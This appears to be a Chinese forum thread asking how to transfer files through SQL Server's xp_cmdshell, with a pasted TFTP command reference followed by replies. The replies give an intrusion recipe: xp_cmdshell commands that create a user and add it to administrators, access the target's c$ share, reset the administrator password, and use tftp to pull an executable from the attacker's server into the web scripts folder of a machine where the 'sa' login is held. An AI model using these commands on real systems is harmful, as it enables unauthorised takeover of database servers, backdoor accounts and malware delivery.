TRY:
用xp_cmdshell 执行TFTP下载或上传文件.
你自己查阅一下TFTP相关的资料吧.TFTP, Trivial File Transfer Protocol / 简单文件传输协议:
定义:
用来下载开始安装过程所需的初始文件的协议。“简单文件传输协议”也被称为 TFTP。 Tftp
将文件传输到正在运行 TFTP 服务的远程计算机或从正在运行 TFTP 服务的远程计算机传输文件。该命令只有在安装了 TCP/IP 协议后才可以使用。tftp [-i] computer [get | put] source [destination]参数-i指定二进制图像传送模式(也称为“八位字节”)。在二进制图像模式中,文件一个字节接一个字节地逐字移动。在传送二进制文件时使用该模式。如果省略了 -i,文件将以 ASCII 模式传送。这是默认的传送模式。此模式将 EOL 字符转换为 UNIX 的回车符和个人计算机的回车符/换行符。在传送文本文件时应使用此模式。如果文件传送成功,将显示数据传输率。computer指定本地或远程计算机。put将本地计算机上的文件 destination 传送到远程计算机上的文件 source。get将远程计算机上的文件 destination 传送到本地计算机上的文件 source。如果将本地计算机上的文件 file-two 传送到远程计算机上的文件 file-one,请指定 put。如果将远程计算机上的文件 file-two 传送到远程计算机上的文件 file-one,请指定 get。因为 tftp 协议不支持用户身份验证,所以用户必须登录,并且文件在远程计算机上必须可以写入。source指定要传送的文件。如果本地文件指定为 -,则远程文件在 stdout 上打印出来(如果获取),或从 stdin(如果放置)读取。destination指定将文件传送到的位置。如果省略了 destination,将假定与 source 同名。

解决方案 »

  1.   

    xp_cmdshell 'ftp ip地址 '
      

  2.   

    exec xp_cmdshell 'net user mm 123 /add'  --添加一用户
    exec xp_cmdshell 'net localgroup administrators mm /add'  --为用户添加管理员权限
    再用\\对方机器\c$入侵
    最后用 exec xp_cmdshell 'net user admin /delete'把用户给删除掉
    改密码:
    xp_cmdshell 'net user administrator "123"'
      

  3.   

    1、
    在本地装个tftp:
    如:
    ftp://challenger:[email protected]/INET/INET-SERVER/tftpd32j.zip
    2、开一个tftp目录3、查询分析器登陆对方4、xp_cmdshell 'tftp -i ???.???.???.??? GET xx.exe c:\inetpub\scripts\xx.exe'
    只要有sa,可以ping通,80%成功。